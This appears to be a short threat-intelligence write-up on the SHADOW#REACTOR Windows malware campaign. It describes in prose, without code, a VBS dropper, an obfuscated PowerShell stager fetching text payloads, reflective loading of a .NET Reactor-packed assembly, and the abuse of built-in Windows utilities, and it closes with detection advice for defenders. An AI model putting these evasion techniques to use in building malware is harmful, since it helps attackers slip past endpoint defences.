PowerShell-Driven Multi-Stage Windows Malware Using Text Payloads

The emergence of SHADOW#REACTOR underscores a broader shift toward layered, script‑driven attack frameworks that exploit native Windows utilities. By chaining a minimal VBS dropper with a heavily obfuscated PowerShell stager, threat actors capitalize on the trust placed in built‑in interpreters. This approach reduces the need for external binaries, lowers the malware’s hash footprint, and leverages living‑off‑the‑land binaries (LOLbins) such as wscript.exe and MSBuild.exe, which are often whitelisted in corporate environments. Consequently, traditional perimeter defenses struggle to flag the initial stages, pushing detection responsibilities deeper into endpoint monitoring.

At the core of the campaign, the PowerShell stage retrieves architecture‑specific text files (qpwoe32.txt or qpwoe64.txt) from remote servers, validates their size, and reconstructs a .NET assembly protected by .NET Reactor. Reactor’s control‑flow obfuscation, string encryption, and native code conversion dramatically increase analysis complexity, rendering static scanners ineffective. The loader’s reflective loading bypasses the file system, while custom XOR‑based string decryption thwarts heuristic pattern matching. This combination of dynamic content delivery and advanced packing creates a moving target that evades sandbox execution and automated threat‑intel pipelines.

For defenders, the SHADOW#REACTOR model highlights the urgency of behavior‑based detection and memory‑analysis capabilities. Monitoring for anomalous PowerShell command lines, unusually large in‑memory scripts, and unexpected MSBuild invocations can surface early indicators of compromise. Deploying endpoint detection and response (EDR) tools that capture PowerShell script block logging and DLL load events will improve visibility into the multi‑stage chain. Moreover, threat‑hunting programs should prioritize hunting for the distinctive text‑payload filenames and the characteristic Reactor decryption patterns, enabling proactive disruption of this modular, scalable attack infrastructure.